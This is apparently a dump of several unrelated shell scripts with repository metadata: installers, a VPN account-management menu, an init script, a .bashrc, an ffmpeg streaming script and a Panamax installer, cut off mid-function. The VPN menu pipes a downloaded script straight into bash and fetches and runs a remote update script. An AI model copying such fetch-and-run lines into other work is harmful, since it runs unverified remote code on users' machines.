# Commit version changes
git add :/
git commit -m "${TAG_DESCRIPTION}" -m "${BUG_FIXES}"
# Add the version tag
echo Adding tag \'${TAG_NAME}\'
git tag -a ${TAG_NAME} -m "${TAG_DESCRIPTION}"
git push --follow-tags
| true
|
2506c946fd076669bdffdd27a1498660d29b7e12
|
Shell
|
bradyhouse/house
|
/fiddles/bash/fiddle-0055-InstallScrapy/script.sh
|
UTF-8
| 537
| 3.640625
| 4
|
[
"MIT"
] |
permissive
|
#!/usr/bin/env bash
clear;
echo "$0" | sed 's/\.\///g' | awk '{print toupper($0)}'
echo "Bash version ${BASH_VERSION}..."
function isPip3Installed() {
if [[ $(which pip3;) ]]
then
echo 0
else
echo -1
fi
}
function installpip3() {
if [[ ! $(isPip3Installed) ]]
then
sudo easy_install pip3;
fi
}
function install-pip3-scrapy() {
sudo pip3 install scrapy;
}
function install() {
if [[ ! $(isPip3Installed) ]]
then
installpip3;
fi
install-pip3-scrapy;
}
| true
|
50c9bfc3c2721f6a1a2c9dd4e05778fbeae7c7b2
|
Shell
|
elhad/cstup
|
/menu
|
UTF-8
| 10,816
| 3.40625
| 3
|
[] |
no_license
|
#!/bin/bash
myip=`ifconfig | grep -Eo 'inet (addr:)?([0-9]*\.){3}[0-9]*' | grep -Eo '([0-9]*\.){3}[0-9]*' | grep -v '127.0.0' | head -n1`;
myint=`ifconfig | grep -B1 "inet addr:$myip" | head -n1 | awk '{print $1}'`;
flag=0
echo
function create_user() {
useradd -M $uname
echo "$uname:$pass" | chpasswd
usermod -e $expdate $uname
myip=`ifconfig | grep -Eo 'inet (addr:)?([0-9]*\.){3}[0-9]*' | grep -Eo '([0-9]*\.){3}[0-9]*' | grep -v '127.0.0' | head -n1`;
myip2="s/xxxxxxxxx/$myip/g";
wget -qO /tmp/client.ovpn "https://raw.githubusercontent.com/elhad/cstup/master/1194-client.conf"
sed -i 's/remote xxxxxxxxx 1194/remote xxxxxxxxx 443/g' /tmp/client.ovpn
sed -i $myip2 /tmp/client.ovpn
echo ""
echo "========================="
echo "Host IP : $myip"
echo "Port : 443/22/80"
echo "Squid : 8080/3128"
echo "========================="
echo "Script by Yujin Barboza , gunakan akun dengan bijak"
echo "========================="
}
function renew_user() {
echo "New expiration date for $uname: $expdate...";
usermod -e $expdate $uname
}
function delete_user(){
userdel $uname
}
function expired_users(){
cat /etc/shadow | cut -d: -f1,8 | sed /:$/d > /tmp/expirelist.txt
totalaccounts=`cat /tmp/expirelist.txt | wc -l`
for((i=1; i<=$totalaccounts; i++ )); do
tuserval=`head -n $i /tmp/expirelist.txt | tail -n 1`
username=`echo $tuserval | cut -f1 -d:`
userexp=`echo $tuserval | cut -f2 -d:`
userexpireinseconds=$(( $userexp * 86400 ))
todaystime=`date +%s`
if [ $userexpireinseconds -lt $todaystime ] ; then
echo $username
fi
done
rm /tmp/expirelist.txt
}
function not_expired_users(){
cat /etc/shadow | cut -d: -f1,8 | sed /:$/d > /tmp/expirelist.txt
totalaccounts=`cat /tmp/expirelist.txt | wc -l`
for((i=1; i<=$totalaccounts; i++ )); do
tuserval=`head -n $i /tmp/expirelist.txt | tail -n 1`
username=`echo $tuserval | cut -f1 -d:`
userexp=`echo $tuserval | cut -f2 -d:`
userexpireinseconds=$(( $userexp * 86400 ))
todaystime=`date +%s`
if [ $userexpireinseconds -gt $todaystime ] ; then
echo $username
fi
done
rm /tmp/expirelist.txt
}
function used_data(){
myip=`ifconfig | grep -Eo 'inet (addr:)?([0-9]*\.){3}[0-9]*' | grep -Eo '([0-9]*\.){3}[0-9]*' | grep -v '127.0.0' | head -n1`
myint=`ifconfig | grep -B1 "inet addr:$myip" | head -n1 | awk '{print $1}'`
ifconfig $myint | grep "RX bytes" | sed -e 's/ *RX [a-z:0-9]*/Received: /g' | sed -e 's/TX [a-z:0-9]*/\nTransfered: /g'
}
clear
echo "--------------- Selamat datang di Server - IP: $myip ---------------"
cname=$( awk -F: '/model name/ {name=$2} END {print name}' /proc/cpuinfo )
cores=$( awk -F: '/model name/ {core++} END {print core}' /proc/cpuinfo )
freq=$( awk -F: ' /cpu MHz/ {freq=$2} END {print freq}' /proc/cpuinfo )
tram=$( free -m | awk 'NR==2 {print $2}' )
swap=$( free -m | awk 'NR==4 {print $2}' )
up=$(uptime|awk '{ $1=$2=$(NF-6)=$(NF-5)=$(NF-4)=$(NF-3)=$(NF-2)=$(NF-1)=$NF=""; print }')
echo -e "\e[032;1mCPU model:\e[0m $cname"
echo -e "\e[032;1mNumber of cores:\e[0m $cores"
echo -e "\e[032;1mCPU frequency:\e[0m $freq MHz"
echo -e "\e[032;1mTotal amount of ram:\e[0m $tram MB"
echo -e "\e[032;1mTotal amount of swap:\e[0m $swap MB"
echo -e "\e[032;1mSystem uptime:\e[0m $up"
echo -e "\e[032;1mScript by:\e[0m Yujin Barboza | https://overses.net/"
echo "------------------------------------------------------------------------------"
echo "Seputar SSH & OpenVPN"
echo -e "\e[031;1m 1\e[0m) Buat Akun SSH/OpenVPN (\e[34;1muser-add\e[0m)"
echo -e "\e[031;1m 2\e[0m) Generate Akun SSH/OpenVPN (\e[34;1muser-gen\e[0m)"
echo -e "\e[031;1m 3\e[0m) Generate Akun Trial (\e[34;1muser-trial\e[0m)"
echo -e "\e[031;1m 4\e[0m) Ganti Password Akun SSH/VPN (\e[34;1muser-pass\e[0m)"
echo -e "\e[031;1m 5\e[0m) Tambah Masa Aktif Akun SSH/OpenVPN (\e[34;1muser-renew\e[0m)"
echo -e "\e[031;1m 6\e[0m) Hapus Akun SSH/OpenVPN (\e[34;1muser-del\e[0m)"
echo -e "\e[031;1m 7\e[0m) Cek Login Dropbear & OpenSSH (\e[34;1muser-login\e[0m)"
echo -e "\e[031;1m 8\e[0m) Auto Limit Multi Login (\e[34;1mauto-limit\e[0m)"
echo -e "\e[031;1m 9\e[0m) Melihat detail user SSH & OpenVPN (\e[34;1muser-detail\e[0m)"
echo -e "\e[031;1m10\e[0m) Daftar Akun dan Expire Date (\e[34;1muser-list\e[0m)"
echo -e "\e[031;1m11\e[0m) Delete Akun Expire (\e[34;1mdelete-user-expire\e[0m)"
echo -e "\e[031;1m12\e[0m) Kill Multi Login (\e[34;1mauto-kill-user\e[0m)"
echo -e "\e[031;1m13\e[0m) Auto Banned Akun (\e[34;1mbanned-user\e[0m)"
echo -e "\e[031;1m14\e[0m) Unbanned Akun (\e[34;1munbanned-user\e[0m)"
echo -e "\e[031;1m15\e[0m) Mengunci Akun SSH & OpenVPN (\e[34;1muser-lock\e[0m)"
echo -e "\e[031;1m16\e[0m) Membuka user SSH & OpenVPN yang terkunci (\e[34;1muser-unlock\e[0m)"
echo -e "\e[031;1m17\e[0m) Melihat daftar user yang terkick oleh perintah user-limit (\e[34;1mlog-limit\e[0m)"
echo -e "\e[031;1m18\e[0m) Melihat daftar user yang terbanned oleh perintah user-ban (\e[34;1mlog-ban\e[0m)"
echo ""
echo "Seputar PPTP VPN"
echo -e "\e[031;1m19\e[0m) Buat Akun PPTP VPN (\e[34;1muser-add-pptp\e[0m)"
echo -e "\e[031;1m20\e[0m) Hapus Akun PPTP VPN (\e[34;1muser-delete-pptp\e[0m)"
echo -e "\e[031;1m21\e[0m) Lihat Detail Akun PPTP VPN (\e[34;1mdetail-pptp\e[0m)"
echo -e "\e[031;1m22\e[0m) Cek login PPTP VPN (\e[34;1muser-login-pptp\e[0m)"
echo -e "\e[031;1m23\e[0m) Lihat Daftar User PPTP VPN (\e[34;1malluser-pptp\e[0m)"
echo ""
echo "Seputar VPS"
echo -e "\e[031;1m24\e[0m) Cek Lokasi User (\e[34;1mcek-lokasi-user\e[0m)"
echo -e "\e[031;1m25\e[0m) Set Auto Reboot (\e[34;1mauto-reboot\e[0m)"
echo -e "\e[031;1m26\e[0m) Speedtest (\e[34;1mcek-speedttes-vps\e[0m)"
echo -e "\e[031;1m27\e[0m) Cek Ram (\e[34;1mcek-ram\e[0m)"
echo -e "\e[031;1m28\e[0m) Edit Banner (\e[34;1medit-banner\e[0m)"
echo -e "\e[031;1m29\e[0m) Edit Port (\e[34;1medit-port\e[0m)"
echo -e "\e[031;1m30\e[0m) Restart (\e[34;1mrestart\e[0m)"
echo -e "\e[031;1m31\e[0m) Benchmark (\e[34;1mbenchmark\e[0m)"
echo -e "\e[031;1m32\e[0m) Ubah Pasword VPS (\e[34;1mpassword\e[0m)"
echo -e "\e[031;1m33\e[0m) Ubah Hostname VPS (\e[34;1mhostname\e[0m)"
echo -e "\e[031;1m34\e[0m) Reboot Server (\e[34;1mreboot\e[0m)"
echo ""
echo "Update Premium Script"
echo -e "\e[031;1m35\e[0m) Log Install (\e[34;1mlog-install\e[0m)"
echo -e "\e[031;1m36\e[0m) Diagnosa (\e[34;1mdiagnosa\e[0m)"
echo ""
echo -e "\e[031;1m x\e[0m) Exit"
read -p "Masukkan pilihan anda, kemudian tekan tombol ENTER: " option1
case $option1 in
1)
clear
buatakun.sh
;;
2)
clear
generate.sh
;;
3)
clear
trial.sh
;;
4)
clear
userpass.sh
;;
5)
clear
userrenew.sh
;;
6)
clear
userdelete.sh
;;
7)
clear
userlogin.sh
;;
8)
clear
autolimit.sh
;;
9)
clear
userdetail.sh
;;
10)
clear
user-list.sh
;;
11)
clear
deleteuserexpire.sh
;;
12)
clear
#!/bin/bash
# Created by https://www.overses.net
# Dilarang Keras Mengambil/mencuplik/mengcopy sebagian atau seluruh script ini.
# Hak Cipta overses.net (Dilindungi Undang-Undang nomor 19 Tahun 2002)
red='\e[1;31m'
green='\e[0;32m'
NC='\e[0m'
echo "Connecting to overses.net..."
sleep 0.2
echo "Checking Permision..."
sleep 0.3
echo -e "${green}Permission Accepted...${NC}"
sleep 1
echo""
read -p "Isikan Maximal User Login (1-2): " MULTILOGIN
echo " AUTO KILL MULTI LOGIN "
echo "-----------------------------"
autokilluser.sh $MULTILOGIN
autokill.sh $MULTILOGIN
echo "-----------------------------"
echo "AUTO KILL MULTI LOGIN SELESAI"
;;
13)
clear
userban.sh
;;
14)
clear
userunban.sh
;;
15)
clear
userlock.sh
;;
16)
clear
userunlock.sh
;;
17)
clear
loglimit.sh
;;
18)
clear
logban.sh
;;
19)
clear
useraddpptp.sh
;;
20)
clear
userdeletepptp.sh
;;
21)
clear
detailpptp.sh
;;
22)
clear
userloginpptp.sh
;;
23)
clear
alluserpptp.sh
;;
24)
clear
userlogin.sh
echo "Contoh: 49.0.35.16 lalu Enter"
read -p "Ketik Salah Satu Alamat IP User: " userip
curl ipinfo.io/$userip
;;
25)
clear
autoreboot.sh
;;
26)
clear
#!/bin/bash
red='\e[1;31m'
green='\e[0;32m'
blue='\e[1;34m'
NC='\e[0m'
echo "Connecting to overses.net..."
sleep 0.2
echo "Checking Permision..."
sleep 0.3
echo -e "${green}Permission Accepted...${NC}"
sleep 1
echo""
echo "Speed Tes Server"
speedtest.py.sh
echo ""
echo "Script Created by https://www.overses.net"
echo "Terimakasih sudah berlangganan di overses.net"
;;
27)
clear
ram.sh
;;
28)
clear
echo -e "1.) Simpan text (CTRL + X, lalu ketik Y dan tekan Enter) " | tee -a log-install.txt
echo -e "2.) Membatalkan edit text (CTRL + X, lalu ketik N dan tekan Enter)" | tee -a log-install.txt
echo "-----------------------------------------------------------" | tee -a log-install.txt
read -p "Tekan ENTER untuk melanjutkan........................ "
nano /bannerssh
/etc/init.d/dropbear restart
;;
29)
clear
ubahport.sh
;;
30)
clear
restart.sh
;;
31)
clear
wget freevps.us/downloads/bench.sh -O - -o /dev/null|bash
;;
32)
clear
echo "Masukan Password VPS, yang mau diganti :"
passwd
;;
33)
clear
echo "Masukan HOSTNAME VPS, yang mau diganti :"
echo "contoh : " hostname ibnu
;;
34)
clear
reboot
;;
35)
clear
log-install.sh
;;
36)
clear
diagnosa.sh
;;
37)
wget -O update.sh https://raw.githubusercontent.com/elhad/cstup/master/config/update.sh && chmod +x update.sh && ./update.sh
;;
x)
;;
*) menu;;
esac
| true
|
b2dde124ea398fe9f0b4cdd9823deafed71623e2
|
Shell
|
shizonic/packages
|
/mail/emailrelay/files/emailrelay.init
|
UTF-8
| 2,133
| 3.34375
| 3
|
[
"GPL-2.0-only",
"LicenseRef-scancode-unknown-license-reference"
] |
permissive
|
#!/bin/sh /etc/rc.common
START=90
USE_PROCD=1
PROG=/usr/bin/emailrelay
NAME=emailrelay
emailrelay_instance()
{
local enabled mode port remote_clients server_tls server_auth extra_cmdline smarthost client_tls client_auth address_verifier domain anonymous
config_get_bool enabled "$1" enabled
config_get mode "$1" mode
config_get port "$1" port
config_get_bool remote_clients "$1" remote_clients
config_get server_tls "$1" server_tls
config_get server_auth "$1" server_auth
config_get extra_cmdline "$1" extra_cmdline
config_get smarthost "$1" smarthost
config_get_bool client_tls "$1" client_tls
config_get client_auth "$1" client_auth
config_get address_verifier "$1" address_verifier
config_get domain "$1" domain
config_get_bool anonymous "$1" anonymous
[ "$enabled" = 0 ] && return 1
procd_open_instance
procd_set_param command "$PROG" --no-daemon
case "$mode" in
"server"|\
"proxy")
procd_append_param command "--as-${mode}"
[ -n "$smarthost" ] && procd_append_param command "$smarthost"
[ -n "$port" ] && procd_append_param command --port "$port"
[ "$remote_clients" = 1 ] && procd_append_param command --remote-clients
[ -n "$server_tls" ] && procd_append_param command --server-tls "$server_tls"
[ -n "$server_auth" ] && procd_append_param command --server-auth "$server_auth"
[ "$client_tls" = 1 ] && procd_append_param command --client-tls
[ -n "$client_auth" ] && procd_append_param command --client-auth "$client_auth"
[ -n "$address_verifier" ] && procd_append_param command --address-verifier "$address_verifier"
[ -n "$domain" ] && procd_append_param command --domain "$domain"
[ "$anonymous" = 1 ] && procd_append_param command --anonymous
;;
"cmdline")
# empty by intention (just append extra_cmdline)
;;
*)
echo "no mode specified"
return 1
;;
esac
[ -n "$extra_cmdline" ] && procd_append_param command $extra_cmdline
procd_set_param respawn
procd_close_instance
}
start_service()
{
[ ! -d /var/spool/emailrelay ] && mkdir -p /var/spool/emailrelay
config_load "${NAME}"
config_foreach emailrelay_instance emailrelay
}
| true
|
98fef49e4ca8832f8a80e6e800c7a600535320ec
|
Shell
|
omrisarig13/config
|
/.bashrc
|
UTF-8
| 4,140
| 2.78125
| 3
|
[] |
no_license
|
#
# ~/.bashrc
#
alias mvim="VIMRUNTIME=/usr/share/vim/vim90 /home/omsa/Programs/vim/src/vim"
alias vimm="mvim"
export VISUAL=mvim
export EDITOR="$VISUAL"
alias ls="ls --color"
alias ll="ls -la --color"
alias l="ls -b --color"
alias ..="cd ../"
alias ...="cd ../../"
alias ....="cd ../../../"
alias .....="cd ../../../../"
alias ......="cd ../../../../../"
alias .......="cd ../../../../../../"
alias ........="cd ../../../../../../../"
alias .........="cd ../../../../../../../../"
alias ..........="cd ../../../../../../../../../"
alias ...........="cd ../../../../../../../../../../"
alias ............="cd ../../../../../../../../../../../"
alias .............="cd ../../../../../../../../../../../../"
alias ..............="cd ../../../../../../../../../../../../../"
alias ...............="cd ../../../../../../../../../../../../../../"
alias ................="cd ../../../../../../../../../../../../../../../"
alias .................="cd ../../../../../../../../../../../../../../../../"
alias ..................="cd ../../../../../../../../../../../../../../../../../"
alias ...................="cd ../../../../../../../../../../../../../../../../../../"
alias remove_exes="find . -perm -1 -type f -maxdepth 1 2>/dev/null | xargs rm"
alias ivm="mvim"
alias :e="mvim"
alias :q="exit"
alias :qa="exit"
alias :w=
alias :wa=
alias potion="~/Projects/vim/potion/bin/potion"
alias python=python3
alias pip=pip3
# Some custom commands
alias learn_vim="mvim -u ~/Projects/mvim/vimrc"
alias cmak="cmake"
alias camke="cmake"
alias amke="make"
alias clipboard='xclip -sel clip'
alias ip-scan='sudo nmap -T4 -sP 172.16.6.0/23'
alias ip-scan-rasp='sudo nmap -T4 -sP 172.16.6.0/23 | grep Raspberry -B 2'
alias mount-omsa='sudo mount -o uid=omsa,gid=omsa'
# alias wgit="git.exe"
# export LD_LIBRARY_PATH="${PATH}:/usr/local/lib"
[[ $- != *i* ]] && return
colors() {
local fgc bgc vals seq0
printf "Color escapes are %s\n" '\e[${value};...;${value}m'
printf "Values 30..37 are \e[33mforeground colors\e[m\n"
printf "Values 40..47 are \e[43mbackground colors\e[m\n"
printf "Value 1 gives a \e[1mbold-faced look\e[m\n\n"
# foreground colors
for fgc in {30..37}; do
# background colors
for bgc in {40..47}; do
fgc=${fgc#37} # white
bgc=${bgc#40} # black
vals="${fgc:+$fgc;}${bgc}"
vals=${vals%%;}
seq0="${vals:+\e[${vals}m}"
printf " %-9s" "${seq0:-(default)}"
printf " ${seq0}TEXT\e[m"
printf " \e[${vals:+${vals+$vals;}}1mBOLD\e[m"
done
echo; echo
done
}
[[ -f ~/.extend.bashrc ]] && . ~/.extend.bashrc
[ -r /usr/share/bash-completion/bash_completion ] && . /usr/share/bash-completion/bash_completion
# Complete Yocto commands
[[ -f ~/.config/yocto-completion/yocto_completion.sh ]] && . ~/.config/yocto-completion/yocto_completion.sh
[[ -f ~/.config/yocto-completion/yocto_completion.sh ]] || echo "Warning: No yocto-completion configured"
# Add git data
[[ -f ~/.config/git/completion.sh ]] && . ~/.config/git/completion.sh
[[ -f ~/.config/git/completion.sh ]] || echo "Warning: No git completion configured"
export PATH="${PATH}:/home/omsa/.config/git/git-extra-commands/bin"
[[ -f ~/.local/bin/bashmarks.sh ]] && . ~/.local/bin/bashmarks.sh
[[ -f ~/.local/bin/bashmarks.sh ]] || echo "Warning: No bashmarks configured"
export CY_TOOLS_PATHS="/home/omsa/Programs/Cypress/ModusToolbox_2.4.0.5972/tools_2.4"
parse_git_branch() {
git branch 2> /dev/null | sed -e '/^[^*]/d' -e 's/* \(.*\)/ (\1)/'
}
PS1="\[\033[1;34m\]\D{} \[\033[36m\]\u\[\033[m\]@\[\033[32m\]\h:\[\033[34m\]\w\[\033[m\]\[\033[36m\]\$(parse_git_branch)\[\033[00m\] \n$ "
bind "set completion-ignore-case on"
bind "set show-all-if-ambiguous on"
set -o vi
bind -m vi-insert "\C-l":clear-screen
bind '"hh":vi-movement-mode'
expor=/usr/share/doc/python2/html/
export NVM_DIR="$HOME/.nvm"
[ -s "$NVM_DIR/nvm.sh" ] && \. "$NVM_DIR/nvm.sh" # This loads nvm
[ -s "$NVM_DIR/bash_completion" ] && \. "$NVM_DIR/bash_completion" # This loads nvm bash_completion
export LIBGPHOTO2_INSTALL_PATH=~/.local
shopt -s cdspell
fortune | cowsay -f tux
export PATH="$PATH:/home/omsa/Downloads/010editor" #ADDED BY 010 EDITOR
| true
|
5536f087aa2d3ae015611a385d4762bfcb57da42
|
Shell
|
widecastlive/nginxffmpeg
|
/scripts/hls.sh
|
UTF-8
| 838
| 2.546875
| 3
|
[] |
no_license
|
#!/bin/sh
on_die ()
{
# kill all children
pkill -KILL -P $$
}
trap 'on_die' TERM
cd /opt/data/hls/;
ffmpeg -i "rtmp://127.0.0.1:1935/$1/$2" \
-filter_complex "[v:0]scale=1920:-2[vout1];[v:0]scale=1280:-2[vout2];[v:0]scale=320:-2[vout3]" \
-g 25 -sc_threshold 0 \
-map "[vout2]" -c:v:0 libx264 -b:v:0 1000k -maxrate:v:0 2500k -bufsize:v:0 5000k \
-map "[vout3]" -c:v:1 libx264 -b:v:1 150k -maxrate:v:1 250k -bufsize:v:1 500k \
-map "[vout1]" -c:v:2 libx264 -b:v:2 2500k -maxrate:v:2 5000k -bufsize:v:2 8000k \
-map a:0 -c:a aac -b:a 92k -ac 2 \
-f hls -hls_time 6 -hls_segment_type fmp4 \
-master_pl_name live.m3u8 \
-strftime 1 -hls_segment_filename output_%v/segment_%s.m4s \
-var_stream_map "a:0,agroup:audio v:0,agroup:audio v:1,agroup:audio v:2,agroup:audio" output_%v/live.m3u8 &
wait
| true
|
0a73b23bea9cd606535dd4806cf66d1eb042f898
|
Shell
|
adon988/adam-centos-bootstrap
|
/auto-install-nedrtree.sh
|
UTF-8
| 1,003
| 2.8125
| 3
|
[] |
no_license
|
#!bin/bash
# NEDRTree
i=0
if [ ! -e ~/.vim ]; then
echo "mkdir ~/.vim"
mkdir ~/.vim
((i++))
else
echo "Already exists ~/.vim"
fi
if [ ! -d ~/.vim/autoload ]; then
echo "mkdir ~/.vim/autoload"
mkdir ~/.vim/autoload
((i++))
else
echo "Already exists ~/.vim/autoload"
fi
if [ ! -d ~/.vim/bundle ]; then
echo "mkdir ~/.vim/bundle"
mkdir ~/.vim/bundle
i = i+1
else
echo "Already exists ~/.vim/bundle"
fi
if [ ! -e ~/.vim/autoload/pathogen.vim ]; then
echo "mkdir ~/.vim/autoload/pathogen.vim"
curl -LSso ~/.vim/autoload/pathogen.vim https://tpo.pe/pathogen.vim
((i++))
else
echo "Already exists ~/.vim/autoload/pathogen.vim"
fi
if [ ! -d ~/.vim/bundle/nerdtree ]; then
cd ~/.vim/bundle
git clone https://github.com/scrooloose/nerdtree.git
((i++))
else
echo "Already exists ~/.vim/bundle/nerdtree.git"
fi
if [ $i = 0 ]; then
echo "Maybe you already install NERDTree"
else
echo "execute pathogen#infect()
nnoremap <silent> <F5> :NERDTree<CR>
let NERDTreeShowHidden=1
" >> ~/.vimrc
fi
echo "Finished!"
| true
|
e76d9ac36f076de578110cea36599716b6d5596f
|
Shell
|
CenturyLinkLabs/panamax-coreos
|
/desktop
|
UTF-8
| 22,288
| 2.875
| 3
|
[
"LicenseRef-scancode-warranty-disclaimer",
"Apache-2.0"
] |
permissive
|
#!/bin/bash
BASEBOX_DEFAULT="panamax-coreos-box-681.2.0"
BASEBOX_URL_DEFAULT="http://stable.release.core-os.net/amd64-usr/681.2.0/coreos_production_vagrant.box"
PMX_IMAGE_TAG_DEFAULT=stable
PMX_UI_TAGS="https://index.docker.io/v1/repositories/centurylink/panamax-ui/tags"
PMX_API_TAGS="https://index.docker.io/v1/repositories/centurylink/panamax-api/tags"
SETUP_UPDATE_URL="http://download.panamax.io/installer/.versions"
DOCUMENTATION_URL="https://github.com/CenturyLinkLabs/panamax-ui/wiki/Release-Notes"
CWD="${HOME}/.panamax/"
PMX_VAR="${HOME}/.panamax"
ENV="$CWD".env_tmp
ENV_COMMIT="$PMX_VAR"/.env
IMAGES_VDI="$PMX_VAR"/images.vdi
IMAGES_ZIP="$PMX_VAR"/images.tar.gz
IMAGES_CDN="http://download.panamax.io/images.tar.gz"
PMX_VM_NAME="panamax-vm"
PMX_VM_MEMORY_DEFAULT=1536
PMX_VM_CPUS_DEFAULT=2
PMX_VM_PRIVATE_IP="10.0.0.200"
PMX_LOCAL_DOMAIN="panamax.local"
PMX_INSECURE_REGISTRY="n"
echo_install="init: First time installing Panamax! - Downloads CoreOS VM and installs latest Panamax version."
echo_restart="restart: Stops and Starts Panamax."
echo_reinstall="reinstall: Deletes your applications and CoreOS VM; reinstalls to latest Panamax version."
echo_update="download: Updates to latest Panamax version."
echo_checkUpdate="check: Checks for available updates for Panamax."
echo_info="info: Displays version of your local panamax install."
echo_stop="pause: Stops Panamax"
echo_start="up: Starts Panamax"
echo_uninstall="delete: Uninstalls Panamax, deletes applications and CoreOS VM."
echo_ssh="ssh: SSH into Panamax CoreOS VM."
echo_help="help: Show this help"
echo_debug="debug: Display your current Panamax settings."
function displayLogo {
tput clear
echo ""
echo -e "\033[0;31;32m███████╗ ██████╗ █████████╗ ██████╗ \033[0m\033[31;37m ██████████╗ ██████╗ ██╗ ██╗\033[0m"
echo -e "\033[0;31;32m██╔══██║ ╚═══██╗ ███╗ ███║ ╚═══██╗\033[0m\033[31;37m ██║ ██╔ ██║ ╚═══██╗ ╚██╗██╔╝\033[0m"
echo -e "\033[0;31;32m██ ██║ ███████║ ███║ ███║ ███████║\033[0m\033[31;37m ██║╚██║ ██║ ███████║ ╚███╔╝ \033[0m"
echo -e "\033[0;31;32m███████╝ ███████║ ███║ ███║ ███████║\033[0m\033[31;37m ██║╚██║ ██║ ███████║ ██╔██╗ \033[0m"
echo -e "\033[0;31;32m██║ ███████║ ███║ ███║ ███████║\033[0m\033[31;37m ██║╚██║ ██║ ███████║ ██╔╝ ██╗\033[0m"
echo -e "\033[0;31;32m╚═╝ ╚══════╝ ╚══╝ ╚══╝ ╚══════╝\033[0m\033[31;37m ╚═╝ ╚═╝ ╚═╝ ╚══════╝ ╚═╝ ╚═╝\033[0m"
echo ""
echo "CenturyLink Labs - http://www.centurylinklabs.com/"
}
function checkPreReqs {
echo ""
echo "Checking if required software is installed."
echo ""
vagrant -v | grep -w '1.[6-9]' 2>&1 >/dev/null
if [[ "$?" -ne "0" ]]; then
echo "Please install vagrant version 1.6.3 or newer (https://www.vagrantup.com/downloads.html).";
exit 1;
else
echo $'Vagrant 1.6 or newer installed.'
fi
VBoxManage -v | grep -w '4\.[3-]\|5\.[0-9]' 2>&1 >/dev/null
if [[ "$?" -ne "0" ]]; then
echo "Please install Virtualbox 4.3 or newer (https://www.virtualbox.org/wiki/Downloads).";
exit 1;
else
echo $'Virtualbox 4.3 or newer installed.'
fi
echo ""
}
function checkPanamaxVmExists {
VBoxManage showvminfo $PMX_VM_NAME > /dev/null 2>&1
if [[ "$?" -ne "0" ]]; then
echo "The $PMX_VM_NAME does not exist. Please run ($ panamax init) to install Panamax."
echo ""
exit 1;
fi
}
function getLatestVersion () {
vList="$@"
versions=($@)
vMax=${versions[0]}
for i in "${versions[@]}"
do
result="`newerVersionAvailable $i \"$vList\"`"
if [[ "$result" == "0" ]]; then
vMax=$i
fi
done
echo $vMax
}
function newerVersionAvailable() {
local v1=$1
local vList=$2
majVer=`echo $v1 | awk -F "." '{ print $1 }'`
minVer=`echo $v1 | awk -F "." '{ print $2 }'`
patVer=`echo $v1 | awk -F "." '{ print $3 }'`
nextMinVer=`echo $minVer + 1 | bc`
nextMajVer=`echo $majVer + 1 | bc`
nextPatVer=`echo $patVer + 1 | bc`
local newVerAvailable=0
if [[ "`echo $vList | grep "$majVer.$minVer.$nextPatVer"`" != "" \
|| "`echo $vList | grep "$majVer.$nextMinVer.[0-9]\+"`" != "" \
|| "`echo $vList | grep "$nextMajVer\.[0-9]+\.[0-9]+"`" != "" ]]; then
newVerAvailable=1
fi
echo $newVerAvailable
}
function checkForSetupUpdate {
if [[ "$checkedSetupForUpdates" != "1" || "$1" == "u" ]]; then
checkedSetupForUpdates="1"
updateAvailableForSetup="0"
if [[ -f "$ENV" ]]; then
source "$ENV"
versionList=`curl -sL $SETUP_UPDATE_URL | grep tar`
local newVersionAvailable="`newerVersionAvailable $PMX_SETUP_VERSION \"$versionList\"`"
if [[ "$newVersionAvailable" == "1" ]]; then
echo "Local Panamax Installer version:"
echo "$PMX_SETUP_VERSION"
echo ""
echo "*** Panamax Installer is out of date! Please run ($ brew upgrade http://download.panamax.io/installer/brew/panamax.rb && panamax reinstall) to update. ***"
updateAvailableForSetup="1"
elif [[ "$1" == "e" ]]; then
echo "Local Panamax Installer version:"
echo " $PMX_SETUP_VERSION"
echo ""
fi
else
echo ""
fi
fi
}
function checkForPanamaxUpdate {
if [[ "$checkedPmxForUpdates" != "1" || "$1" == "u" ]]; then
checkedPmxForUpdates="1"
updateAvailableForPmx="0"
if [[ -f "$ENV" ]]; then
source "$ENV"
if [[ "$PMX_IMAGE_TAG" == "dev" ]]; then
if [[ "$PMX_INSTALL_DATE" -le "` date -j -v-1d +%s`" ]]; then
echo "You are currently running a Dev version of Panamax which is updated nightly."
echo "A newer Dev version is available. Use the update option to get the latest Dev version."
updateAvailableForPmx="1"
elif [[ "$1" == "e" ]]; then
echo "Local Panamax component versions:"
echo " UI: dev nightly build"
echo " API: dev nightly build"
fi
elif [[ "$PMX_INSTALL_TAG_UI" != "" || "$PMX_INSTALL_TAG_API" != "" || "$1" == "e" ]]; then
latestTagUi="`getLatestVersion $PMX_INSTALL_TAG_UI \"$(getTagsUi)\"`"
latestTagApi="`getLatestVersion $PMX_INSTALL_TAG_API \"$(getTagsApi)\"`"
if [[ "$PMX_INSTALL_TAG_UI" != "$latestTagUi" || "$PMX_INSTALL_TAG_API" != "$latestTagApi" ]]; then
echo "Local Panamax component versions:"
echo " UI: $PMX_INSTALL_TAG_UI"
echo " API: $PMX_INSTALL_TAG_API"
echo "Latest Panamax component versions:"
echo " UI: $latestTagUi"
echo " API: $latestTagApi"
echo ""
echo "*** Panamax is out of date! Please use the download/update option to get the latest. Release notes are available at ($DOCUMENTATION_URL) . ***"
echo ""
updateAvailableForPmx="1"
elif [[ "$1" == "e" ]]; then
echo "Local Panamax component versions:"
echo " UI: $PMX_INSTALL_TAG_UI"
echo " API: $PMX_INSTALL_TAG_API"
fi
fi
else
echo ""
fi
fi
}
function getPanamaxSetupVersion {
echo "\"$(<"$CWD.version")\""
exit 0;
}
function checkForUpdate {
if [[ "$1" == "e" || "$1" == "u" ]]; then
checkPreReqs
checkPanamaxVmExists
fi
echo ""
checkForPanamaxUpdate "$1"
checkForSetupUpdate "$1"
if [[ "$1" == "u" && $updateAvailableForSetup == "0" && $updateAvailableForPmx == "0" ]]; then
echo "Panamax is already up to date!"
fi
echo ""
}
function getTagsUi {
echo `curl --silent $PMX_UI_TAGS | grep -o "[0-9]*\.[0-9]*\.[0-9]*" | awk '{ print $1}'`
}
function getTagsApi {
echo `curl --silent $PMX_API_TAGS | grep -o "[0-9]*\.[0-9]*\.[0-9]*" | awk '{ print $1}'`
}
function runVagrant {
cd "$CWD" && vagrant "$@"
}
function saveVersionInfo {
setEnvVar "PMX_SETUP_VERSION" "\"$(<"$CWD.version")\""
setEnvVar "PMX_INSTALL_DATE" "\"`date +%s`\""
if [[ "$PMX_IMAGE_TAG" == "stable" ]]; then
setEnvVar "PMX_INSTALL_TAG_UI" "`getLatestVersion \"$(getTagsUi)\"`"
setEnvVar "PMX_INSTALL_TAG_API" "`getLatestVersion \"$(getTagsApi)\"`"
fi
